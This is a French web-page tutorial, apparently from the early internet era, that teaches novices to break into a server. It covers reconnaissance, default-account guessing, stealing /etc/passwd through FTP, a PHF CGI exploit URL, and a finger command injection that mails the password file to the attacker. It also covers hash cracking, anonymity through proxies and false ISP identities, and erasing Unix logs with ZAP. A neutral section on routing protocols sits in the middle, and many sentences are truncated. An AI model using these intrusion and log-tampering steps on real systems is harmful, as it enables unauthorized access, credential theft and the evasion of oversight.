"; ?>
![]() |
||||||||||||
![]() |
||||||||||||
![]() |
||||||||||||
![]() |
||||||||||||
[Je veux commencer par le début] [Je connais deja et je veux aller + loin]
INTRODUCTION:
Quand nous parlons de ‘Hacking’,
nous parlons d'avoir un accés sur un serveur que nous n'avons
pas. (1) un nom (login name) , qui est le même
que son repertoire ; et Le login name et le password donneront accés
à tout les services de Fred - e-mail , news ,
[Ok, je veux aller jusqu'a 'anatomie du hack'] [ Je connais deja tout çà envoie moi directement au hack]
L'ANATOMIE DU HACK :
[Ok, Let's Go! Mais dis moi je risque pas de me faire niquer ?] [C'est bon je sais comment ne pas me faire niquer,c'est pour les newbies ce truc ?!]
'NE PAS SE FAIRE NIQUER':
1. Quand vous installer un compte avec un ISP,
donner un faux nom et une fausse adresse. Ou,
[Nah,j'ai pas trop envie de faire çà , y a quoi comme autres trucs ?] [Ok j'utilise deja cette arnaque que puis je faire d'autres ?] [Stop ! Je sais DEJA comment ne pas se faire griller on passe à la technique ?]
'NE PAS SE FAIRE NIQUER': 2. Hacker en utilisant un faux compte (password
perdu, etc.). Un outil appelé Dripper peut
[Nah,dis moi juste quelque chose de facile que je peux faire maintenant !] [Ok, c'est fait. Rien d'autre à faire ?]
'NE PAS SE FAIRE NIQUER': 3. Pointer vos paramètres de connection ailleurs. Vous pouvez le faire facilement en changeant
vos paramètres Proxy. En utilisant les paramètres Si vous voulez le super anonymat ! ,
RASSEMBLER DES INFOS: Pour bien commencer, vous aurez besoin de recolter
des informations a propos de www.victime.com
[Ok, Comment ?] [Non, j'ai deja chopper toutes les infos , dis moi juste ce qu'il faut faire]
LE CHOPPAGE D'INFOS: Nous allons maintenant commencer par la première
étape de tout bon hack qui se respecte....le Prenez un calpin , et ouvrez une nouvelle fenetre
de votre navigateur (par l'intermédiare de
[Ok, et maintenant ?]
IDENTIFIER VOTRE VICTIME: 1. D'abord allez sur le site "victime".
Recopiez toutes les adresses e-mail présentes ,
[ C'est fait quoi d'autres ?]
L'ARNAQUE DE L'ERREUR DE MAIL: 2. Envoyer un e-mail a une personne inexistante
. Si le site est www.victime.com , Recopiez ces infos. (Pour garder l'anonymat, ce serai une bonne idée
d'envoyer et de recevoir le mail par
[C'est fait quoi d'autres ??]
TRACEROUTE: 3. Toujours en gardant l'anonymat , tracer victime.com à l'aide du champs de recherche ci-dessous Cela vous indiquera l'origine du provider du serveur de la victime.
TOOLS
[Ok, quoi ensuite ??]
WHOIS: 3. Toujours en gardant l'anonymat, faites un
Whois sur le site. La recherche Whois est Cela vous donnera des infos sur la personne qui possède le site et qui le fait tourner.
TOOLS
[Ok, quoi ensuite ??]
L'OUTILS FINGER: 4. Maintenant nous allons utiliser l'outil Finger.
D'abord utiliser le finger comme suit :
FINGER
[Ok, quoi ensuite ??]
LE SCAN DE LA MORT: 5. Maintenant nous allons scanner tout les ports du site. Le scan permet de verifier tout les ports ouverts
pour une IP. Cette étape est très importante, Il n'y a pas de techniques sures pour cacher
un scan port , mais li existe quelques scanner Ok ! , Le scan des ports vous permettra de savoir
quels services le site est en train de faire [Ok, quoi ensuite ??]
TELNET: 5. L'utilité de Telnet est qu'il permet
de trouver à quel type de serveur vous avez affaire. Utilisez telnet sur le site cible par le port
23. Habituellement , si l'adresse est
[Ca marche ! j'ai le type de serveur !] [Nop ! rien ne marche :(]
TELNET: Maintenant changez le port telnet au port 21.
Cela va vous envoyer à leur serveur FTP.
[CA marche !] [Toujours pas :((]
TELNET: Maintenant si vous êtes chanceux mettez
le port sur 80 (c'est le port HTTP).
[Ouf ! çà marche enfin !] [Je ne suis qu'un lame mais je veux perseverer !]
UTILISER DES PROGRAMMES LAME: Vous avez BESOIN de savoir de quel type de serveur
il sagit avant de hacker quoi que ce soit. Une des dernières solutions et d'utiliser
un programme appelé Whats Running? Cela ne marche Si çà ne marche toujours pas demerdez
vous pour trouver cette info ! sans çà pas de hack !.
[Ok ! Maintenant j'ai les infos ! je veux avoir l'accès au serveur !]
HACKER A PARTIR DU PASSWORD: Maintenant nous allons essayer de trouver la combinaison du pass pour rentrer dans le serveur.
[Ok, Je veux être root !!] [Nah, je sais deja que ce serveur va necessiter un "exploit"]
D'ABORD ESSAYER DES TRUCS SIMPLES:
Utilisez un autre Telnet que celui de windaube
car sinon votre adresse ip sera ACCOUNT: PASSWORD Les accounts root, mountfsys, umountfsys, install,
sont des acconts root ,
[Nup...çà marche po !] [Incroyable ! ce truc de lamer fini fonctionne à merveille !]
UTILISER LES NOMS COMME LOGIN ET PASSWORD: Encore un truc simple. Entre 1 et 20 personnes
par serveur sont assez stupides pour avoir le même Par exemple si le site web fait référence
à robert @victime.com , $Login: Fred Faites çà avec tout les noms que vous avez trouver - vous pourriez être chanceux :)). Ca marche ?
[Nah,ils ont une putain de sécurité çà ne marche pas ! ] [Oh, cool ! j'ai accés à un account !!]
CHOPPER LE FICHIER PASSWD Vous n'avez probablement pas de chance jusqu'a maintenant. Admettons que vous essayer de penetrer un système
UNIX , maintenant
[Ok ! allons y !]
ANCIENNE METHODE CHINOISE PAR FTP: Votre browser devrait être configuré
pour utiliser de faux proxy. Nous utiliserons ce même browser
Utilisez votre browser , essayez en FTP avec victime.com . Exemple: ftp://victime.com Si cela ne marche pas , essayez toujours en FTP avec ftp.victime.com . Exemple: ftp://ftp.victime.com Si çà ne marche pas, essayez avec
FTP les noms de domaines des serveurs que vous avez chopper
[Ok, j'y suis !] [Nah, çà marche pas et çà commence à prendre la tête , mais je vais quand même le faire :)) ! ]
ANCIENNE METHODE CHINOISE PAR FTP: Maintenant que vous êtes connecté au serveur FTP de victime.com , clikez sur le repertoire /etc. Vous devriez voir un fichier nommé ‘passwd’et
peut être aussi un fichier appelé ‘group’.
Si vous êtes chanceux il devrait ressembler à çà : root:2fkbNba29uWys:0:1:Operator:/:/bin/csh Par exemple ,nous voyons qu'il y a un loggin
“kangaroo” et son password crypté Ou alors ce la ressemble plutot à çà : root:*:0:1:Operator:/:/bin/csh Si la section du pass est formé par des
* ou des x , c'est mauvais !–
[Nah, je ne trouve pas le fichier passwd] [Cool ! je suis tombé sur un fichier non-shadowed]
DECRYPTER UN FICHIER PASSWD: il y a pleins de programmes sur le net qui permettent
de cracker des password Unix on les Le meilleur password cracker du moment est 'John
the Ripper 1.5’. Il est facilement trouvable. Vous aurez aussi besoin d'un ‘wordfile’,
il s'agit d'un fichier contenant des mots ,
[Oui ! j'ai récupperer des pass!] [Nah, le cryptage est trop balèze !]
LA TECHNIQUE OLD-STYLE DU PHF : Aujourd'hui la plupart des serveurs ont supprimé
leur programme PHF, testez quand même :)... Dans l'Overlord Anonymizer , tapez:: http://www.victime.com /cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd. OVERLORD ANONYMIZER
Si PHF est actif (souvent il ne l'est plus), toutes les infos s'afficherons dans votre navigateur !.
[Nah, ils ont grillé le bug PHF depuis 10 ans man !] [Yes! j'ai choppé quelques pass crypté !!]
FINGER BOX HACKING: Les serveurs Finger sont les mais des hackers
!. Nous allons capté si www.victime.com à un Dans l'Anonymizer tapez www.victime.com /cgi-bin/finger OVERLORD ANONYMIZER
Si çà marche vous avez encore une chance de récupperer le fichier etc/passwd. Ok !, 1/ prenez votre calepin ou vous avez noter
les adresse e-mail du site 2/ Retournez a la finger box, et tapez ceci :
(en changeant les adresses e-mail par les reelles ! kangaroo@victime.com ; /bin/mail your@email.org < etc/passwd Ce truc va chopper le fichier passwd par kangaroo@victime.com
et vous l'envoyer a VOTRE
[Nah, çà marche pas] [Oui ! j'ai enfin choppé ce fichier !]
FELICITATIONS !: Vous avez accés au serveur !. Maintenant si vous avez un login et un pass ,
vous pouvez utiliser le compte mail de l'utilisateur, Voila c'est la fin de ce tutorial , j'espère
qu'il vous aura aider ! Dans le cas contraire ,
Le spoofing, ah la grande question
que beaucoup de monde se pose ! Le spoofing c’est l’art d’avoir
une fausse identité sur le net. Avoir une fausse IP, 1). les IP : Premièrement, la partie la plus connue
du spoofing, la dissimulation d’ip. Comment qu’on fais ?
Donc vous serez anonyme au point de vu de votre
ip. Les proxy servent en général pour le http, Et ouaip c’est très utile d’avoir
une fausse ip sous irc, ça vous permet d’éviter
INTERNET <—> PROXY <—>
VOUS Comment qu’on fait ? Vous aller me dire mais comment trouver une wingate
ou un proxy et comment l’utiliser ??? Donc une fois votre liste de « bon »
proxy obtenu et bien déconnecter vous et aller dans les Si vous arrivez pas à obtenir l’affichage
d’une page et bien refaire la manipulation avec un autre Ensuite y a une deuxième méthode
pour obtenir un proxy. Vous en installer un sur un ordi d’un Pour IRC : et bien vous avez besoin d’un
scanneur de wingates (cf partie downloads). Je vous conseil de faire une petite réserve de wingate car vous devrez probablement en changer tous les jours. Ya une autre méthode pour obtenir des wingates. Vous chercher directement sur irc des gas qui ont le câble. Vous faite un /dns pour avoir leur ip et vous essayer de vous connecter par son ordi, en gros son ordi est la wingate. Mais faut que le port 23 soit ouvert et c’est pas sur que ça marche, mais parfois ça marche !
2). Les pseudos Le choix est la manipulation de pseudos paraît très simple mais en fait, ce n’est pas le cas. Il est toujours bon d’avoir plusieurs pseudos. Un pour le public (moi c The JokeR), c’est par ce pseudo que l’on vous connaîtra sur le net, c’est le pseudo que vous utiliserez pour envoyer des mails à vos pots etc…, ensuite il faut un deuxième pseudo qui servira de nom de guerre pour signer vos hacks. Ce pseudo personne ne doit le connaître a part vous, ni proche, ni hackers, ni parents, que VOUS !!! ainsi si vous faîtes un hack et qu’on va vous chercher sur le net, sur irc ou encore que les keufs (DST) demande a des hackers « balance » qui vous êtes etc… et bien ils trouveront rien puisque personne ne connaît votre pseudo de guerre ! Ensuite il vous faut 2 autres pseudos, un bidon qui vous sert de temps en temps sur IRC et un autre qui peut vous servir pour mettre dans des greets ou des trucs comme ça. Mais bon c’est pas tellement nécessaire. Enfin dites vous que plus vous avez de pseudo et plus les piste seront brouillées. Par exemple vous posez une question sur Mysql sur un forum, faites le avec un pseudo, ensuite si vous posez le même genre de question sur IRC et bien faites le avec un autre pseudo et pour le hack signé avec un troisième pseudo. Certain vont me dire que je suis grave parano et que ça sert a rien, et bien c’est peut être vrai mais vaut mieux l’être trop que pas assez !! Le plus dur n’est pas le choix des pseudos mais c’est bien de séparer tous les pseudos, que chaque pseudo soit une vie différente. Et ça croyez moi c’est extrêmement dur, moi j’y arrive pas ! Par exemple vous laissez un message sur un forum avec un pseudo et vous répondez au gas par mail avec votre vrai pseudo parce que vous avez pas penser a changer votre mail d’envoi dans outlook. Ce genre de plantage arrive souvent et la confusion devient très rapide ! Très vite quand on vous mail vous ne savez plus sous quel pseudo vous connaît la personne et avec le quel vous devez lui répondre. Pour remédier a ce problème et bien faite vous autant d’identités sous Outlook que de pseudos, autant de mails que de pseudos etc… chacun doit être indépendant. Et avant chaque connexion vous devez choisir le pseudo avec le quel vous vous connecté et ne pas en changer en cours de route sauf si vous êtes sûr de vous. Ça paraît un peu barbare mais c’est le meilleur moyen de pas se planter. Une fois qu’un pseudo est grillé et bien il faut rechanger.
3). Les mails : Bon la ça va être très court
! déjà et bien avoir plusieurs mail comme dis au-dessus.
Et puis pour vous faire passer pour quelqu’un d’autre et
bien utiliser un fake mail ou anonymail (cf partie downloads). On ne
peut pas appeler ça du spoofing mais bon on je le fou la quand
même, je vais pas chier un cake pour 3 lignes !! 4). Faux account : Avoir un faux account peut s’avérer
également utile pour brouiller les traces. Avant de vous connectez faites quand même le 3651.
5). CONCLUSION : Je vous est présenter ici des techniques
de spoofing pour le surf de
Etant donné le peu de docs sur les routeurs,
je me suis décidé a écrire quelque chose. Le routage Le routage est une opération réalisée
par la couche transport du modèle IP ( ou IPX) qui consiste — la route la plus économique ;
Les principes du routage Le routage est en général une opération qui concerne la couche 3 de l’OSI, mais, pour répondre aux besoins de la réalisation de réseaux locaux, on a donné la possibilité à la couche MAC d’effectuer du routage à ce niveau. Il est réalisé par une machine désignée sous le nom de routeur qui est : — soit un équipement spécialisé
; le routage désigne l’opération exécutée par le logiciel d ‘un routeur (ou un équipement se comportant comme tel) ; il consiste à lire les adresse de destination des paquets (information de niveau 3), à choisir le cheminement qui permettra d’adresser ceux-ci et à permettre aux trames de passer au travers de deux ponts reliant deux brins de réseau. Pour réaliser cette fonction, trois techniques ont été élaborées : — celle du pont « transparent » Dans tous les cas le processus de routage est
entièrement automatique. Le fonctionnement des routeurs La fonction routage est particulièrement simple à mettre en œuvre, mais elle comporte une limite importante : c’est une opération qui s’effectue au niveau 3 du modèle (c.à.d des couches contrôles de liens) et certains protocoles ne sont pas routables comme les protocoles SNA (Systems Network Architecture), APPN (Advanced Peer-to-Peer Networking) , LAT ou Netbios. La grande différence avec un pont réside dans le fait que le routeur travaille sur des informations niveau paquets. Pour réaliser sa fonction le routeur doit constituer et maintenir des tables de routage continuellement mise a jour ; ce processus et celui du choix des routes à prendre s’effectuent dans le cadre d’un algorithme qui lui est propre. Dans la mesure où ils sont capables d’effectuer des opération de délestage automatique, les routeurs effectuent des opérations infiniment plus complexes que les ponts. Les protocoles de routage : le routage désigne l’opération qui consiste à acheminer un paquet de données vers une direction en fonction de l'adresse de destination du paquet. La question qui se pose est la suivante : comment sont construites les tables de routage et quelles sont les informations qui la composent ? Pour qu'une opération puisse se réaliser, deux conditions sont à remplir : — le paquet doit être géré
par un protocole routable ; Le principe consiste, pour chaque routeur, à gérer des tables de routage en précisant l'adresse du réseau de destination, le nombre de nœuds à traverser pour l'atteindre, et l'adresse du port permettant l'accès du nœud. Tous les protocoles de transport ne sont pas routables (par exemple les protocoles SDLC [Synchronous Data Link Control]. LAT et DECNET [Digital Equipment Corporation NETwork] ne le sont pas directement); pour qu'ils le soient, deux conditions doivent être remplies : — le noeud doit comporter une fonction
routage qui soit en mesure d'assurer l'implémentation de l'algorithme,
les manipulations et les mises à jour des tables ; Le rôle du routage est de déterminer le meilleur chemin à prendre pour accéder à un point. Les algorithmes de routage sont nombreux, et certains ne sont pas encore publiés; il est cependant possible de les classer en deux familles : — le routage interne ; Routage interne : Un protocole de routage est dit « interne » (au sens TCP/IP) lorsqu'il est propre à un système autonome. Un tel système dépend d'un seul administrateur de réseau; il a la charge de choisir les protocoles et de donner une vision homogène de l'ensemble.RIP (Routing Information Protocol) est le plus couramment utilisé ; il a été mis au point à l'Université de Berkeley sur la base de recherches effectuées à Palo Alto et doit son succès à sa diffusion - pratiquement universelle - sur tous les centraux Unix ou TCP,IP. Son principe consiste à chercher la meilleure voie possible - estimée en nombre de passerelles (Hop) - à traverser. La principale critique qu'on peut lui adresser tient au fait que son nombre de nœuds est limité (maximum 15) et que son choix des routes ne tient pas compte de la qualité des lignes et de leur charge. Dans la pratique, RIP est implémenté par défaut sur tous les nœuds. Issu de la technique dite de «vecteur distant », ce protocole est basé sur une classification des nœuds en « non actifs » et «actifs» (si une passerelle est active, elle propage les routes qu'elle connaît vers les autres, ce qui leur permet de mettre à jour leurs tables de routage). HELLO se base sur la notion de temps d'acheminement des paquets ; son principe consiste à mesurer le temps nécessaire à un paquet pour aller vers un nœud de destination et de choisir la route la plus rapide. SPF (Shortest Path First) est destiné aux réseaux de grandes dimensions et a un principe équivalent à celui de RIP. OSPF (Open Shortest Path First) n'est pas encore, à ce jour, un protocole disponible pour tous les systèmes. Comme RIP son principe consiste à choisir la route la plus courte mais en y incluant les notions de qualité et de coût des lignes, ce qui lui permet de, déterminer plusieurs chemins possibles pour une même destination. Routage externe : Les protocoles dits « externes » - ou EGP (Exterior Gateway Protocol) - sont décrits par le RFC 1163. Implémentés dans des passerelles se chargeant d'établir la communication, ils permettent un routage entre domaines autonomes, c'est-à-dire entre deux réseaux (ou ensemble de réseaux) dépendant d'administrations différentes. On désigne sous le nom de voisins externes (Exterior Neighbour) deux passerelles en relation directe mais appartenant à deux domaines différents. C'est le protocole EGP qui se charge d'échanger des informations au travers de ces passerelles et assure trois fonctions essentielles : — Acquérir le voisin (Neighbour
Acquisition), c'est-à-dire permettre à une passerelle
de demander une autorisation d'échange à une autre. Cette
action se déroule par émission d'un message EGP suivant
une périodicité désignée sous le nom de
Hello Intervall. Les mécanismes de routage : La mise en place de mécanismes de routage pose deux problèmes de construction : — quelles sont les informations à
mettre dans les tables de routage ? ; Le principe de leur construction reste celui de la passerelle et se présente comme un nœud installé entre les réseaux. Le routage s'effectue à partir des informations figurant dans les tables ; ces dernières contiennent les adresses du réseau (en fait d'autres passerelles) et celles des routes dites « par défaut » (c'est-à-dire des adresses de passerelles). Les algorithmes de routage. Le choix, par les organismes de normalisation, d'un algorithme de routage qui soit performant et économique est au cœur d'enjeux industriels qui concernent un marché en pleine expansion. Les algorithmes sont construits sur deux principes de base : — le routage par vecteurs distants ; L'objectif est de trouver le cheminement le plus rapide, à un instant donné, pour qu'un paquet puisse atteindre son nœud de destination. Routage par vecteurs distants. Le principe des algorithmes de vecteurs distants consiste à construire, pour chaque nœud, une métrique qui soit composée du nombre de passerelles nécessaire pour atteindre un nœud. Le processus de calcul de la route s'effectue selon les phases suivantes : — Chaque routeur dispose de son propre
identificateur. Ces informations sont mises à jour périodiquement, chaque fois qu'une nouvelle destination est rencontrée ou qu'un vecteur distant, pour une même destination, est constaté par le routeur. Routage LSR. L'idée de base du Link State Routing est que chaque nœud dispose d'une topographie du réseau constituée par les ponts-routeurs régulièrement mise à jour. Le principe de son fonctionnement est le suivant : — Chaque routeur se charge de rencontrer
ses voisins et d'enregistrer leurs noms dans ses tables. Le routage multiprotocoles. La technologie des routeurs est basée sur la réalisation d'un protocole de «bout en bout» qui transporte des informations en mode Full Duplex entre deux nœuds. Ce protocole (du moins dans la situation actuelle) est propriétaire (ce qui veut dire que les routeurs doivent provenir du même constructeur). La réalisation d'un routeur multiprotocoles a pour objet de transporter un trafic entre deux nœuds (ou plus) qui appartienne à plusieurs protocoles de haut niveau. Dans la pratique les constructeurs fournissent un interface logiciel permettant de réaliser la translation du protocole externe dans le protocole interne de façon biunivoque. La difficulté du routage (qui rend particulièrement complexe la réalisation de produits) est que cette opération doit être distribuée dans le temps et dans l'espace et que les décisions de routage qui sont prises pour chaque paquet dans les nœuds doivent prendre en compte cette contrainte. Un routeur multiprotocoles doit donc disposer de tables de routage et effectuer en continu les opérations suivantes : — échange des tables de routage
entre les nœuds. Pour réaliser des routeurs multiprotocoles, il existe deux approches possibles : — soit un équipement spécifique,
connecté sur les réseaux locaux, qui prenne en compte
la totalité du trafic et ne route que la partie qui l'intéresse
; Cette dernière solution permet l'interconnexion derouteurs à travers des réseaux longue distance. Les principes du routage multiprotocoles. Les routeurs multiprotocoles sont destinés à acheminer sur un même support de transmission (liaisons Transfix, Numéris, X25) un trafic appartenant à différents protocoles routables (lP, lPX, etc.) d'une façon transparente pour les utilisateurs finaux. Un routeur est destiné à interconnecter au moins deux réseaux locaux, c'est-à-dire que l'opération de routage consistera à acheminer - d'un nœud à l'autre - des trames Ethernet et/ou des trames Token-Ring, voire FDDI. Les routeurs vont utiliser entre eux un protocole dit « de proche en proche » dont certains sont normalisés et d'autres propriétaires (exemple CISCO avec leur protocole IGRP [Interior Gateway Routing Protocol]). Ces protocoles ont certaines propriétés qui sont, d'une part, la transparence par rapport aux données acheminées et, d'autre part, les possibilités de routage dynamique. Cette dernière propriété consiste à déterminer un certain nombre d'acheminements alternés en cas d'indisponibilité ou de surcharge d'une liaison primaire. Toute la qualité d'un routage consiste dans la façon dont cette opération est effectuée. Le routeur sait reconnaître dans les trames Ethernet et les trames SDLC le protocole de haut niveau auquel il appartient. Dans un routeur multiprotocoles le logiciel va
tester le code protocole de la trame et l'encapsuler dans les paquets
du protocole interne (qui vont être acheminés d'un routeur
à l'autre dans le cadre d'un protocole de « proche en proche
»). Le routage lP. L'architecture TCP/IP est devenue un standard
en matière d'interconnexion de réseaux. Cette situation
est due à la richesse des concepts mis en œuvre ainsi qu'à
l'universalité des implémentations disponibles. L'architecture
TCP/IP est parfaitement en mesure d'assurer les mêmes fonctions
qu'un gestionnaire de réseau local (comme « NetWare »
ou « LAN Manager »), c'est-à-dire de serveur de fichiers,
de programmes, d'impressions et d'administration du réseau. L'adressage. Le principe de l'adressage consiste à définir deux champs différents : — le champ réseau ; Un même nœud peut disposer de deux adresses, correspondant à deux rattachements physiques sur deux réseaux différents. Classes d'adresses. II existe quatre classes d'adresses lP tenant sur 32 bits. chacune d'elles correspondant à une typologie de réseau particulière et dont le principe varie entre ces deux extrêmes : — beaucoup de réseaux et peu de
nœuds ; Classe Identificateur Adresse réseau Hôte A 0724 7 24 Ce système (qui dépend de la typologie du réseau) définit une adresse totale, fournie par les couches supérieures sur 32 bits, la taille des champs-adresses « physique» et «hôte». Les paquets reçus sont remis à la couche lP et transformés par cette dernière en datagrammes qui vont alors avoir à résoudre deux problèmes importants : — la résolution des adresses ; En premier lieu il faut établir une correspondance entre l'adresse lP et l'adresse physique (exemple, carte Ethernet tenant en 48 bits). Le mécanisme de résolution d'adresses (connu sous le nom de protocole ARP [Address Resolution Protocol]) se chargera, par dialogue, d'effectuer une correspondance entre les deux adresses (physique et logique). En second lieu il faut résoudre le problème de la mise en relation entre l'adresse IP et celle de l'interface du PC (cette opération est à effectuer au moment de l'installation du logiciel). Un même « hôte » est en mesure de disposer de plusieurs adresses correspondant à des rattachements différents (c'est le cas des postes situés en position de passerelle ou de routeur). Les critères de choix d'un mode d'adressage sont les suivants : — Dans le cas où le réseau
aura à se connecter sur un réseau public (Internet), l'adressage
devra être conforme à celui du NIC (Network Information
Center), et une demande d'homologation devra être transmise à
l'INRIA (Institut national de la recherche en informatique et en automatique). Sous-réseau. La manipulation du plan d'adressage peut présenter des contraintes lourdes d'exploitation. C'est la raison pour laquelle le concept du sous-réseau a été introduit. Le principe consiste à définir certains bits de l'adresse-réseau comme appartenant - pour le nœud considéré - à un sous-réseau et à associer un masque de taille égale à l'adresse IP dont la signification est la suivante : — à chaque bit du masque égal
à l, le bit correspondant de l'adresse IP est dit appartenir
à une adresse-réseau ; Masques de sous-réseau. Un réseau (au sens IP) a besoin d'une adresse qui lui soit spécifique ; la taille de son champ étant parfois insuffisante pour décrire le réseau il est possible de prendre des bits appartenant à l'adresse-hôte et de les allouer à l'adresse-réseau ou vice versa, ce qui conduit à déterminer un nouveau schéma d'adressage pour le sous-réseau. Pour effectuer cette modification du système d'adressage, on utilise la notion de « masque binaire », directement associé à l'adresse IP. Son principe est de définir une suite de bits = l (qui constitueront l'adresse-réseau) et de bits = 0 (qui constitueront l'adresse-hôte) que l'on désignera sous le nom de sous-réseau et à partir de laquelle on pourra effectuer les opérations de routage internes au réseau. Protocole ARP. Chaque nœud dispose d'au moins une adresse IP ; cependant, sur un réseau donné, deux nœuds ne peuvent communiquer que s'ils disposent d'adresses réelles, reconnues par les ports de communication. Pour transmettre un paquet, le nœud émetteur doit effectuer une opération dite de mapping entre l'adresse IP et l'adresse physique. Ce problème dit « de résolution d'adresse » a été réglé par la définition d'algorithmes de bas niveau. Une difficulté réside encore dans la structure des champs d'adressage qui ne sont pas compatibles (Ethernet a une adresse physique comportant 48 bits et IP n'en comporte que 32). Le protocole ARP (Address Resolution Protocol) est basé sur le principe suivant : — Lorsqu'une station du réseau a
besoin de connaître l'adresse physique d'une autre (alors qu'elle
ne connaît que son adresse IP), elle transmet sous la forme d'un
broadcast. Protocole RARP. Comme il existe des stations ne disposant pas d'unité où ils pourraient stocker les adresses physiques des nœuds de destination, un protocole complémentaire - RARP (Reverse Address Resolution Protocol) - a été développé qui non seulement en tient compte, mais, de plus, limite la transmission de paquets sur le réseau (opération toujours coûteuse). Ce protocole est basé sur le principe suivant lequel, si la station qui demande une adresse physique a un destinataire, celui-ci aura vraisemblablement à demander l'adresse physique de l'émetteur. Le protocole transmet donc - à l'ensemble du réseau et dans le même paquet - l'adresse IP et l'adresse physique de l'émetteur; les stations se présentant comme des serveurs RARP retransmettent leurs adresses (IP et physique) dans leur réponse. Le routage des datagrammes. Le datagramme se présente comme un paquet transmis sur le réseau en mode dit «non connecté» (c'est-à-dire que deux paquets envoyés vers une même destination sont susceptibles de prendre deux cheminements différents). Cette situation est facile à mettre en évidence. On écrit deux programmes pour deux stations reliées à un même réseau : — le premier programme pour transmettre
des paquets en mode « datagramme » dans une boucle ; On s'aperçoit alors que sur 5 000 paquets transmis un certain nombre ne parviennent jamais, et que beaucoup arrivent dans le désordre. C'est la raison pour laquelle on a mis au point une technique dite de l’encapsulage qui consiste à mettre une trame dans une autre, laquelle sera transmise et acquittée (c'est ainsi que l'on encapsule des paquets IP dans des trames X25, en utilisant la norme dite « RFC 877 »). Le routage est une opération permettant d'acheminer un paquet de données en fonction de son adresse de destination et des tables de routage contenues dans les nœuds routeurs. Cependant, dans un réseau IP, les interconnexions sont réalisées par des nœuds « Passerelles» (ou Gateway), chacun étant relié à au moins deux réseaux différents (toute machine disposant d'un rattachement physique à au moins deux réseaux est en mesure de se comporter comme une passerelle). Cette distinction entre nœud et passerelle conduit à définir deux types de routage : — le routage direct qui consiste à
transmettre des paquets d'un nœud à l'autre sur un même
réseau ; Pour que cette opération puisse se réaliser, tous les nœuds du réseau doivent comporter l'adresse de la passerelle afin que les paquets non destinés au réseau lui soient transmis ; ainsi les paquets transitent de passerelle en passerelle jusqu'à destination. Chaque passerelle contient des tables de routage, accessibles à partir des nœuds passerelles ; dans la mesure où un champ désigne l'adresse du réseau de destination, la structure du routage IP - dont le principe de l'algorithme se base sur le calcul d'adresses dit Next Hope (prochain saut) - se prête particulièrement bien à ce type de mécanisme. Le routage GGP. La mise en place de mécanismes de routage pose deux problèmes de construction : — quelles sont les informations à
mettre dans les tables de routage ? ; Le principe de leur construction reste celui de la passerelle et se présente comme un nœud installé entre les réseaux. Le routage s'effectue à partir des informations contenues dans les tables. Ces dernières contiennent des adresses de réseau (en fait d'autres passerelles) et des routes dites « par défaut » (c'est-à-dire des adresses de passerelles). L’IP Tunnelling. Le transport par TCP/IP est devenu non seulement universel, mais également un outil de connexion de protocoles hétérogènes grâce à une technique dite d'encapsulage qui consiste à mettre les données d'un protocole externe dans des paquets IP et à les reconstituer sur des nœuds de destination. Lorsqu'il s'agit à' encapsuler des protocoles dits « non routables», il faut présenter aux couches supérieures l'équivalent de ce qui est une ligne. La technique dite de Tunnelling (utilisée pour acheminer un trafic SNA [Systems Network Architecture] ou DECNET [Digital Equipment Corporation NETwork]) sur un réseau IP) consiste à créer un circuit virtuel entre le routeur d'origine et le routeur de destination que tous les paquets IP - dans lesquels auront été encapsulés les messages du protocole non routable - emprunteront.
Ouf cet article est fini… Je crois qu’il est assez complet, et présente bien plusieurs aspects de routeurs et du routage. Ceci est tiré de différents bouquins,
eh j’ai quand même pas inventer tout ça, il a bien
fallu que je l’apprenne quelque part… La base de cette partie est écrite par JB34 . Niveau des communications téléphoniques: Pour que le provider auquel nous allons nous
loguer pour avoir accès à internet ne puisse
Niveau du provider: Là vous ne prenez pas votre compte personnel
avec vos infos personnelles
Niveau d'Internet: Là les méthodes sont des plus variées
et des plus sophistiquées.
Niveau de la Cible: Là il faut effacer un maximum de traces
(toutes ci possibles) et en créer des fausses pourquoi pas.
Voici comment effacer ses traces sous unix : 1. Ne rien laisser dans les répertoires HOME et TEMP des serveurs 2. Lister tous les éléments modifiés avant de se déconnecter : ls -altr 3. Utiliser les commandes csh suivantes pour effacer les données d'historique sans laisser de trace : mv .logout save.1 4. Nettoyer les fichiers "logs" des serveurs : Sous Unix il faut connaître au moins 3 fichiers importants: WTMP - chaque connexion/déconnexion avec
l'heure, le serveur et le terminal concerné
L'admin peut utiliser ces fichiers pour les commandes statistiques (lastlogin), pour par exemple savoir quand a eu lieu l'intrusion et puis le temps estimé de l'attaque (tout pour vous retrouver). Il faut savoir aussi que toutes les connexions par ftp, rlogin, telnet sont enregistrées dans ces fichiers. Mais ne pas effacer ces fichiers car l'admin saura immédiatement que l'intrusion a eu lieu. Pour vous simplifier la tâche utiliser un prog de modification de ces fichiers: ZAP ou ZAP2 (remplace la dernière donnée de connexion par des 00000000). Recommandation: pour modifier le LASTLOG sans toucher au fichier, une fois connecté, lancer un rlogin "serveur cible" avec le login et pass du compte utilisateur hacké. Cela a pour effet d'enregistrer un LASTLOGIN à partir du serveur et non à partir de l'extérieur. Normalement ces modifs sont possibles que par le ROOT. Mais si le ROOT n'a pas été obtenu, il suffit pour certaines version d'Unix de faire un login lors de votre connexion sur le serveur pour modifier le LASTLOG. 5.Trouver touus les fichiers modifiés après la connexion: juste après être connecté faire: "touch /tmp/check" avant de continuer à travailler. Par la suite faire: "find / -newer /tmpcheck -print" ou "find / -ctime 0 -print" ou encore "find / -cmin 0 -print", vérifier les fichiers d'audit et les modifier. 6. Vérifier les répertoires s par défaut: /usr/adm , /var/adm , /var/log 7. Manipuler les prg de sécurité installés: Sur les serveurs sécurisés, les prg de sécurité sont lancés à intervalles périodiques par cron. Ces programmes vérifient les tailles de fichiers ou analysent les logs serveurs. Ils peuvent également être stockés dans les répertoires /adm ou ~bin (pour les sniffers). Accéder aux paramètres de cron. Le rep par défaut est /var/spool/cron/crontabs. Vérifiez toutes les entrées surtout les fichiers "root" et analysez les prgs lancés. Faire par exemple: "crontab -l root". Les prgs de sécurité sont en général: tiger, spi, tripwire, 15, binaudit, hobgoblin, s3, ... voilà bon là normalement vous pouvez être tranquil mais bon on est jamais trop prudent et faut se dire qu'il y a toujours plus malin que nous. Je ne cesse pas de le dire mais ne négligez pas la victime qui elle aussi peut s'y connaître en hack alors n'effacez rien et n'abîmez aucune donnée. Car un HACKER n'est pas un CRACKER... Donc, en conclusion, soyez parano, et surtout
même si la cible paraît peu importante, n’hésitez
pas à prendre toutes les précautions possibles. De plus,
ne soyez pas con et n’utilisez pas bêtement des programmes
parfois efficaces mais qui ne sont pas safe du tout.
|
||||||||||||